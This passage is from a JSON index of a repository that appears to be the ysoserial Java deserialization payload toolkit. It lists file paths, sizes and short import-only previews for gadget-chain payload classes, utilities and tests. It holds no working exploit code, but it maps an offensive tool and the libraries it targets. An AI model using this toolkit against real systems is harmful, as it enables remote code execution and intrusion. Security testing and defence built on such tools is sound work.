    "preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.Map;\n\nimport org.codehaus.groo"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Hibernate1.java",
    "chars": 8552,
    "preview": "package ysoserial.payloads;\n\n\nimport java.lang.reflect.Array;\nimport java.lang.reflect.Constructor;\nimport java.lang.ref"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Hibernate2.java",
    "chars": 2079,
    "preview": "package ysoserial.payloads;\n\n\nimport ysoserial.payloads.annotation.Authors;\nimport ysoserial.payloads.annotation.Payload"
  },
  {
    "path": "src/main/java/ysoserial/payloads/JBossInterceptors1.java",
    "chars": 4156,
    "preview": "package ysoserial.payloads;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport org.jboss.interce"
  },
  {
    "path": "src/main/java/ysoserial/payloads/JRMPClient.java",
    "chars": 2689,
    "preview": "package ysoserial.payloads;\n\n\nimport java.lang.reflect.Proxy;\nimport java.rmi.registry.Registry;\nimport java.rmi.server."
  },
  {
    "path": "src/main/java/ysoserial/payloads/JRMPListener.java",
    "chars": 1861,
    "preview": "package ysoserial.payloads;\n\n\nimport java.rmi.server.RemoteObject;\nimport java.rmi.server.RemoteRef;\nimport java.rmi.ser"
  },
  {
    "path": "src/main/java/ysoserial/payloads/JSON1.java",
    "chars": 5503,
    "preview": "package ysoserial.payloads;\n\n\nimport ysoserial.payloads.annotation.Authors;\nimport ysoserial.payloads.annotation.Depende"
  },
  {
    "path": "src/main/java/ysoserial/payloads/JavassistWeld1.java",
    "chars": 4213,
    "preview": "package ysoserial.payloads;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport org.jboss.weld.in"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Jdk7u21.java",
    "chars": 3074,
    "preview": "package ysoserial.payloads;\n\nimport java.lang.reflect.InvocationHandler;\nimport java.util.HashMap;\nimport java.util.Link"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Jython1.java",
    "chars": 4599,
    "preview": "package ysoserial.payloads;\n\nimport org.apache.commons.io.FileUtils;\nimport org.python.core.*;\n\nimport java.math.BigInte"
  },
  {
    "path": "src/main/java/ysoserial/payloads/MozillaRhino1.java",
    "chars": 3427,
    "preview": "package ysoserial.payloads;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport org.mozilla.javas"
  },
  {
    "path": "src/main/java/ysoserial/payloads/MozillaRhino2.java",
    "chars": 4892,
    "preview": "package ysoserial.payloads;\n\nimport org.mozilla.javascript.*;\nimport org.mozilla.javascript.tools.shell.Environment;\nimp"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Myfaces1.java",
    "chars": 3858,
    "preview": "package ysoserial.payloads;\n\n\n\nimport javax.el.ELContext;\nimport javax.el.ExpressionFactory;\nimport javax.el.ValueExpres"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Myfaces2.java",
    "chars": 2434,
    "preview": "package ysoserial.payloads;\n\n\n\nimport ysoserial.payloads.annotation.Authors;\nimport ysoserial.payloads.annotation.Payloa"
  },
  {
    "path": "src/main/java/ysoserial/payloads/ObjectPayload.java",
    "chars": 3813,
    "preview": "package ysoserial.payloads;\n\n\nimport java.lang.reflect.Modifier;\nimport java.util.Iterator;\nimport java.util.Set;\n\nimpor"
  },
  {
    "path": "src/main/java/ysoserial/payloads/ROME.java",
    "chars": 1354,
    "preview": "package ysoserial.payloads;\n\n\nimport javax.xml.transform.Templates;\n\nimport com.sun.syndication.feed.impl.ObjectBean;\n\ni"
  },
  {
    "path": "src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java",
    "chars": 180,
    "preview": "package ysoserial.payloads;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface ReleaseableObjectPayload<T> extends Object"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Spring1.java",
    "chars": 3203,
    "preview": "package ysoserial.payloads;\n\nimport static java.lang.Class.forName;\n\nimport java.lang.reflect.Constructor;\nimport java.l"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Spring2.java",
    "chars": 2774,
    "preview": "package ysoserial.payloads;\n\n\nimport static java.lang.Class.forName;\n\nimport java.lang.reflect.InvocationHandler;\nimport"
  },
  {
    "path": "src/main/java/ysoserial/payloads/URLDNS.java",
    "chars": 3523,
    "preview": "package ysoserial.payloads;\n\nimport java.io.IOException;\nimport java.net.InetAddress;\nimport java.net.URLConnection;\nimp"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Vaadin1.java",
    "chars": 3610,
    "preview": "package ysoserial.payloads;\n\nimport javax.management.BadAttributeValueExpException;\n\nimport com.vaadin.data.util.NestedM"
  },
  {
    "path": "src/main/java/ysoserial/payloads/Wicket1.java",
    "chars": 4707,
    "preview": "package ysoserial.payloads;\n\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java."
  },
  {
    "path": "src/main/java/ysoserial/payloads/annotation/Authors.java",
    "chars": 1327,
    "preview": "package ysoserial.payloads.annotation;\n\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\n"
  },
  {
    "path": "src/main/java/ysoserial/payloads/annotation/Dependencies.java",
    "chars": 993,
    "preview": "package ysoserial.payloads.annotation;\n\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\n"
  },
  {
    "path": "src/main/java/ysoserial/payloads/annotation/PayloadTest.java",
    "chars": 361,
    "preview": "package ysoserial.payloads.annotation;\n\nimport java.lang.annotation.Retention;\nimport java.lang.annotation.RetentionPoli"
  },
  {
    "path": "src/main/java/ysoserial/payloads/util/ClassFiles.java",
    "chars": 1174,
    "preview": "package ysoserial.payloads.util;\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.IOException;\nimport java.io.Input"
  },
  {
    "path": "src/main/java/ysoserial/payloads/util/Gadgets.java",
    "chars": 6492,
    "preview": "package ysoserial.payloads.util;\n\n\nimport static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_"
  },
  {
    "path": "src/main/java/ysoserial/payloads/util/JavaVersion.java",
    "chars": 1255,
    "preview": "package ysoserial.payloads.util;\n\n\n/**\n * @author mbechler\n *\n */\npublic class JavaVersion {\n\n\n    public int major;\n   "
  },
  {
    "path": "src/main/java/ysoserial/payloads/util/PayloadRunner.java",
    "chars": 2079,
    "preview": "package ysoserial.payloads.util;\n\nimport java.util.concurrent.Callable;\n\nimport ysoserial.Deserializer;\nimport ysoserial"
  },
  {
    "path": "src/main/java/ysoserial/payloads/util/Reflections.java",
    "chars": 3051,
    "preview": "package ysoserial.payloads.util;\n\nimport java.lang.reflect.AccessibleObject;\nimport java.lang.reflect.Constructor;\nimpor"
  },
  {
    "path": "src/main/java/ysoserial/secmgr/DelegateSecurityManager.java",
    "chars": 4522,
    "preview": "package ysoserial.secmgr;\n\nimport java.io.FileDescriptor;\nimport java.net.InetAddress;\nimport java.security.Permission;\n"
  },
  {
    "path": "src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java",
    "chars": 2268,
    "preview": "package ysoserial.secmgr;\n\nimport java.security.Permission;\nimport java.util.Collections;\nimport java.util.LinkedList;\ni"
  },
  {
    "path": "src/test/java/ysoserial/CiTest.java",
    "chars": 257,
    "preview": "package ysoserial;\n\nimport org.junit.Test;\n\npublic class CiTest {\n    @Test\n    public void test() {\n        System.out."
  },
  {
    "path": "src/test/java/ysoserial/test/CustomDeserializer.java",
    "chars": 139,
    "preview": "package ysoserial.test;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface CustomDeserializer {\n\n\n    Class<?> getCustomD"
  },
  {
    "path": "src/test/java/ysoserial/test/CustomPayloadArgs.java",
    "chars": 129,
    "preview": "package ysoserial.test;\n\n\n/**\n * @author mbechler\n *\n */\npublic interface CustomPayloadArgs {\n\n\n    String getPayloadArg"
  },
  {
    "path": "src/test/java/ysoserial/test/CustomTest.java",
    "chars": 212,
    "preview": "package ysoserial.test;\n\nimport java.util.concurrent.Callable;\n\n/**\n * @author mbechler\n *\n */\npublic interface CustomTe"
  },
  {
    "path": "src/test/java/ysoserial/test/WrappedTest.java",
    "chars": 228,
    "preview": "package ysoserial.test;\n\nimport java.util.concurrent.Callable;\n\n/**\n * @author mbechler\n *\n */\npublic interface WrappedT"
  },
  {
    "path": "src/test/java/ysoserial/test/exploit/RMIRegistryExploitTest.java",
    "chars": 579,
    "preview": "package ysoserial.test.exploit;\n\nimport java.rmi.RemoteException;\nimport java.rmi.registry.LocateRegistry;\nimport java.r"
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/CommandExecTest.java",
    "chars": 1202,
    "preview": "package ysoserial.test.payloads;\n\nimport org.junit.Assert;\nimport ysoserial.test.CustomTest;\nimport ysoserial.test.util."
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/FileUploadTest.java",
    "chars": 2384,
    "preview": "package ysoserial.test.payloads;\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.util.Arrays;\nimport java."
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/JRMPReverseConnectSMTest.java",
    "chars": 1498,
    "preview": "package ysoserial.test.payloads;\n\n\nimport java.net.URL;\nimport java.util.concurrent.Callable;\n\nimport ysoserial.test.Wra"
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/JRMPReverseConnectTest.java",
    "chars": 1154,
    "preview": "package ysoserial.test.payloads;\n\n\nimport java.util.concurrent.Callable;\n\nimport javax.management.BadAttributeValueExpEx"
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/MyfacesTest.java",
    "chars": 5824,
    "preview": "package ysoserial.test.payloads;\n\n\nimport java.beans.FeatureDescriptor;\nimport java.net.MalformedURLException;\nimport ja"
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/PayloadsTest.java",
    "chars": 13285,
    "preview": "package ysoserial.test.payloads;\n\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.File;\nimport java.io.OutputStrea"
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/RemoteClassLoadingTest.java",
    "chars": 3518,
    "preview": "package ysoserial.test.payloads;\n\n\nimport java.io.ByteArrayInputStream;\nimport java.io.IOException;\nimport java.io.Seria"
  },
  {
    "path": "src/test/java/ysoserial/test/payloads/TestHarnessTest.java",
    "chars": 2030,
    "preview": "package ysoserial.test.payloads;\n\nimport java.io.IOException;\nimport java.io.ObjectInputStream;\nimport java.io.Serializa"
  },
  {
    "path": "src/test/java/ysoserial/test/util/Callables.java",
    "chars": 926,
    "preview": "package ysoserial.test.util;\n\nimport java.util.concurrent.Callable;\n\npublic class Callables {\n    public static interfac"
  },
  {
    "path": "src/test/java/ysoserial/test/util/Files.java",
    "chars": 349,
    "preview": "package ysoserial.test.util;\n\nimport java.io.File;\n\npublic class Files {\n    public static void waitForFile(File file, i"
  },
  {
    "path": "src/test/java/ysoserial/test/util/GadgetsTest.java",
    "chars": 427,
    "preview": "package ysoserial.test.util;\n\nimport org.junit.Test;\nimport ysoserial.payloads.util.Gadgets;\n\npublic class GadgetsTest {"
  },
  {
    "path": "src/test/java/ysoserial/test/util/OS.java",
    "chars": 689,
    "preview": "package ysoserial.test.util;\n\npublic enum OS {\n    WINDOWS,\n    LINUX,\n    OSX,\n    OTHER;\n\n    private static final OS "
  },
  {
    "path": "src/test/java/ysoserial/test/util/Throwables.java",
    "chars": 234,
    "preview": "package ysoserial.test.util;\n\npublic class Throwables {\n\tpublic static Throwable getInnermostCause(final Throwable t) {\n"
  }
]
